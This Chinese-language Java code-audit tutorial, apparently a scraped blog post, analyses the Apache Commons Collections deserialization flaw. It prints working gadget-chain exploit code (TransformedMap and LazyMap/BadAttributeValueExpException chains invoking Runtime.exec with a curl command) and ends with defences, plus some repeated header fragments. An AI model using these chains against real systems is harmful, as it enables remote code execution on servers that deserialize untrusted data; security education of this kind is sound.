Java代码审计：Apache Commons Collections反序列化漏洞分析<\/h1>

一、漏洞概述<\/h2>
Apache Commons Collections是一个广泛使用的Java库，提供了许多有用的工具类和数据结构实现。该库在3.1-3.2.1版本中存在反序列化漏洞，攻击者可以通过构造特殊的序列化数据，在目标系统上执行任意代码。<\/p>

二、漏洞原理分析<\/h2>

1. 核心漏洞点<\/h3>

漏洞的核心在于InvokerTransformer<\/code>类的transform<\/code>方法：<\/p>

public<\/span> Object transform<\/span>(<\/span>Object input)<\/span> {<\/span>
<\/span><\/span>    if<\/span> (<\/span>input ==<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>        return<\/span> null<\/span>;<\/span>
<\/span><\/span>    }<\/span> else<\/span> {<\/span>
<\/span><\/span>        try<\/span> {<\/span>
<\/span><\/span>            Class cls =<\/span> input.<\/span>getClass<\/span>();<\/span>
<\/span><\/span>            Method method =<\/span> cls.<\/span>getMethod<\/span>(<\/span>this<\/span>.<\/span>iMethodName<\/span>,<\/span> this<\/span>.<\/span>iParamTypes<\/span>);<\/span>
<\/span><\/span>            return<\/span> method.<\/span>invoke<\/span>(<\/span>input,<\/span> this<\/span>.<\/span>iArgs<\/span>);<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>NoSuchMethodException var5)<\/span> {<\/span>
<\/span><\/span>            throw<\/span> new<\/span> FunctorException(<\/span>"InvokerTransformer: The method '"<\/span> +<\/span> this<\/span>.<\/span>iMethodName<\/span> +<\/span> "' on '"<\/span> +<\/span> input.<\/span>getClass<\/span>()<\/span> +<\/span> "' does not exist"<\/span>);<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>IllegalAccessException var6)<\/span> {<\/span>
<\/span><\/span>            throw<\/span> new<\/span> FunctorException(<\/span>"InvokerTransformer: The method '"<\/span> +<\/span> this<\/span>.<\/span>iMethodName<\/span> +<\/span> "' on '"<\/span> +<\/span> input.<\/span>getClass<\/span>()<\/span> +<\/span> "' cannot be accessed"<\/span>);<\/span>
<\/span><\/span>        }<\/span> catch<\/span> (<\/span>InvocationTargetException var7)<\/span> {<\/span>
<\/span><\/span>            throw<\/span> new<\/span> FunctorException(<\/span>"InvokerTransformer: The method '"<\/span> +<\/span> this<\/span>.<\/span>iMethodName<\/span> +<\/span> "' on '"<\/span> +<\/span> input.<\/span>getClass<\/span>()<\/span> +<\/span> "' threw an exception"<\/span>,<\/span> var7);<\/span>
<\/span><\/span>        }<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>该方法通过反射调用任意方法，当攻击者能够控制iMethodName<\/code>、iParamTypes<\/code>和iArgs<\/code>参数时，就可以执行任意代码。<\/p>
2. 调用链构造<\/h3>
单独使用InvokerTransformer<\/code>不足以实现RCE，需要结合其他类构造调用链：<\/p>
Transformer[]<\/span> transformers =<\/span> {<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> new<\/span> Class[]{<\/span> String.<\/span>class<\/span>,<\/span> Class[].<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span> new<\/span> Class[<\/span>0<\/span>]<\/span> }),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> new<\/span> Class[]{<\/span> Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>},<\/span> new<\/span> Object[]{<\/span> null<\/span> ,<\/span>new<\/span> Object[<\/span>0<\/span>]}<\/span> ),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> new<\/span> Class[]<\/span> {<\/span>String.<\/span>class<\/span> },<\/span> new<\/span> Object[]<\/span> {<\/span>"curl http:\/\/127.0.0.1:10000"<\/span>})<\/span>
<\/span><\/span>};<\/span>
<\/span><\/span>Transformer transformerChain =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span>
<\/span><\/span><\/code><\/pre>这段代码相当于执行了以下Java代码：<\/p>
((<\/span>Runtime)<\/span> Runtime.<\/span>class<\/span>.<\/span>getMethod<\/span>(<\/span>"getRuntime"<\/span>).<\/span>invoke<\/span>()).<\/span>exec<\/span>(<\/span>"curl http:\/\/127.0.0.1:10000"<\/span>)<\/span>
<\/span><\/span><\/code><\/pre>3. 序列化问题解决<\/h3>
直接序列化Runtime.getRuntime()<\/code>会失败，因为Runtime<\/code>类不可序列化。解决方案是通过反射链动态获取Runtime<\/code>实例：<\/p>
new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span>  \/\/ 获取Runtime.class对象
<\/span><\/span><\/span><\/span>new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> ...),<\/span>  \/\/ 获取getMethod方法
<\/span><\/span><\/span><\/span>new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> ...),<\/span>  \/\/ 调用getRuntime方法获取Runtime实例
<\/span><\/span><\/span><\/span>new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> ...)<\/span>  \/\/ 执行命令
<\/span><\/span><\/span><\/code><\/pre>三、攻击链分析<\/h2>
攻击链一：TransformedMap + AnnotationInvocationHandler (JDK < 1.7)<\/h3>

TransformedMap触发点<\/strong><\/li>
<\/ol>
protected<\/span> Object transformValue<\/span>(<\/span>Object object)<\/span> {<\/span>
<\/span><\/span>    return<\/span> this<\/span>.<\/span>valueTransformer<\/span> ==<\/span> null<\/span> ?<\/span> object :<\/span> this<\/span>.<\/span>valueTransformer<\/span>.<\/span>transform<\/span>(<\/span>object);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>通过TransformedMap.decorate()<\/code>可以控制valueTransformer<\/code>：<\/p>
Map map =<\/span> new<\/span> HashMap();<\/span>
<\/span><\/span>Map transformedmap =<\/span> TransformedMap.<\/span>decorate<\/span>(<\/span>map,<\/span> null<\/span>,<\/span> transformerChain);<\/span>
<\/span><\/span><\/code><\/pre>
AnnotationInvocationHandler触发<\/strong><\/li>
<\/ol>
在JDK < 1.7中，AnnotationInvocationHandler<\/code>的readObject<\/code>方法会操作Map：<\/p>
private<\/span> void<\/span> readObject<\/span>(<\/span>java.<\/span>io<\/span>.<\/span>ObjectInputStream<\/span> s)<\/span> throws<\/span> IOException,<\/span> ClassNotFoundException {<\/span>
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>    for<\/span> (<\/span>Map.<\/span>Entry<\/span><<\/span>String,<\/span> Object><\/span> memberValue :<\/span> memberValues.<\/span>entrySet<\/span>())<\/span> {<\/span>
<\/span><\/span>        \/\/ ...
<\/span><\/span><\/span><\/span>        memberValue.<\/span>setValue<\/span>(...);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>
完整利用代码<\/strong><\/li>
<\/ol>
Map map =<\/span> new<\/span> HashMap();<\/span>
<\/span><\/span>map.<\/span>put<\/span>(<\/span>"value"<\/span>,<\/span> "2"<\/span>);<\/span>  \/\/ key必须为"value"
<\/span><\/span><\/span><\/span>Map transformedmap =<\/span> TransformedMap.<\/span>decorate<\/span>(<\/span>map,<\/span> null<\/span>,<\/span> transformerChain);<\/span>
<\/span><\/span>
<\/span><\/span>Class clazz =<\/span> Class.<\/span>forName<\/span>(<\/span>"sun.reflect.annotation.AnnotationInvocationHandler"<\/span>);<\/span>
<\/span><\/span>Constructor cons =<\/span> clazz.<\/span>getDeclaredConstructor<\/span>(<\/span>Class.<\/span>class<\/span>,<\/span>Map.<\/span>class<\/span>);<\/span>
<\/span><\/span>cons.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>Object ins =<\/span> cons.<\/span>newInstance<\/span>(<\/span>java.<\/span>lang<\/span>.<\/span>annotation<\/span>.<\/span>Retention<\/span>.<\/span>class<\/span>,<\/span>transformedmap);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 序列化和反序列化触发
<\/span><\/span><\/span><\/code><\/pre>攻击链二：LazyMap + TiedMapEntry + BadAttributeValueExpException (JDK >= 1.8)<\/h3>

LazyMap触发点<\/strong><\/li>
<\/ol>
public<\/span> Object get<\/span>(<\/span>Object key)<\/span> {<\/span>
<\/span><\/span>    if<\/span> (!<\/span>super<\/span>.<\/span>map<\/span>.<\/span>containsKey<\/span>(<\/span>key))<\/span> {<\/span>
<\/span><\/span>        Object value =<\/span> this<\/span>.<\/span>factory<\/span>.<\/span>transform<\/span>(<\/span>key);<\/span>
<\/span><\/span>        super<\/span>.<\/span>map<\/span>.<\/span>put<\/span>(<\/span>key,<\/span> value);<\/span>
<\/span><\/span>        return<\/span> value;<\/span>
<\/span><\/span>    }<\/span> else<\/span> {<\/span>
<\/span><\/span>        return<\/span> super<\/span>.<\/span>map<\/span>.<\/span>get<\/span>(<\/span>key);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>
TiedMapEntry触发toString<\/strong><\/li>
<\/ol>
public<\/span> Object getValue<\/span>()<\/span> {<\/span>
<\/span><\/span>    return<\/span> this<\/span>.<\/span>map<\/span>.<\/span>get<\/span>(<\/span>this<\/span>.<\/span>key<\/span>);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> String toString<\/span>()<\/span> {<\/span>
<\/span><\/span>    return<\/span> this<\/span>.<\/span>getKey<\/span>()<\/span> +<\/span> "="<\/span> +<\/span> this<\/span>.<\/span>getValue<\/span>();<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>
BadAttributeValueExpException触发readObject<\/strong><\/li>
<\/ol>
private<\/span> void<\/span> readObject<\/span>(<\/span>ObjectInputStream ois)<\/span> throws<\/span> IOException,<\/span> ClassNotFoundException {<\/span>
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>    val =<\/span> valObj.<\/span>toString<\/span>();<\/span>  \/\/ 触发toString
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>
完整利用代码<\/strong><\/li>
<\/ol>
Map innerMap =<\/span> new<\/span> HashMap();<\/span>
<\/span><\/span>Map lazyMap =<\/span> LazyMap.<\/span>decorate<\/span>(<\/span>innerMap,<\/span> transformerChain);<\/span>
<\/span><\/span>TiedMapEntry entry =<\/span> new<\/span> TiedMapEntry(<\/span>lazyMap,<\/span> "foo"<\/span>);<\/span>
<\/span><\/span>
<\/span><\/span>BadAttributeValueExpException ins =<\/span> new<\/span> BadAttributeValueExpException(<\/span>null<\/span>);<\/span>
<\/span><\/span>Field valfield =<\/span> ins.<\/span>getClass<\/span>().<\/span>getDeclaredField<\/span>(<\/span>"val"<\/span>);<\/span>
<\/span><\/span>valfield.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>valfield.<\/span>set<\/span>(<\/span>ins,<\/span> entry);<\/span>
<\/span><\/span>
<\/span><\/span>\/\/ 序列化和反序列化触发
<\/span><\/span><\/span><\/code><\/pre>四、防御措施<\/h2>

升级Apache Commons Collections到3.2.2或更高版本<\/li>
使用Java反序列化过滤器<\/li>
避免反序列化不可信数据<\/li>
使用安全管理器限制危险操作<\/li>
<\/ol>
五、总结<\/h2>
Apache Commons Collections反序列化漏洞展示了Java反序列化攻击的典型模式：<\/p>

利用可序列化的危险类构造调用链<\/li>
通过反射机制绕过限制执行任意代码<\/li>
寻找合适的触发点自动执行恶意代码<\/li>
<\/ol>
理解这个漏洞有助于提高Java代码审计能力，特别是对反序列化操作的安全意识。<\/p>

Java代码审计：Apache Commons Collections反序列化漏洞分析<\/h1>

一、漏洞概述<\/h2> Apache Commons Collections是一个广泛使用的Java库，提供了许多有用的工具类和数据结构实现。该库在3.1-3.2.1版本中存在反序列化漏洞，攻击者可以通过构造特殊的序列化数据，在目标系统上执行任意代码。<\/p>

二、漏洞原理分析<\/h2>

三、攻击链分析<\/h2>

一、漏洞概述<\/h2>
Apache Commons Collections是一个广泛使用的Java库，提供了许多有用的工具类和数据结构实现。该库在3.1-3.2.1版本中存在反序列化漏洞，攻击者可以通过构造特殊的序列化数据，在目标系统上执行任意代码。<\/p>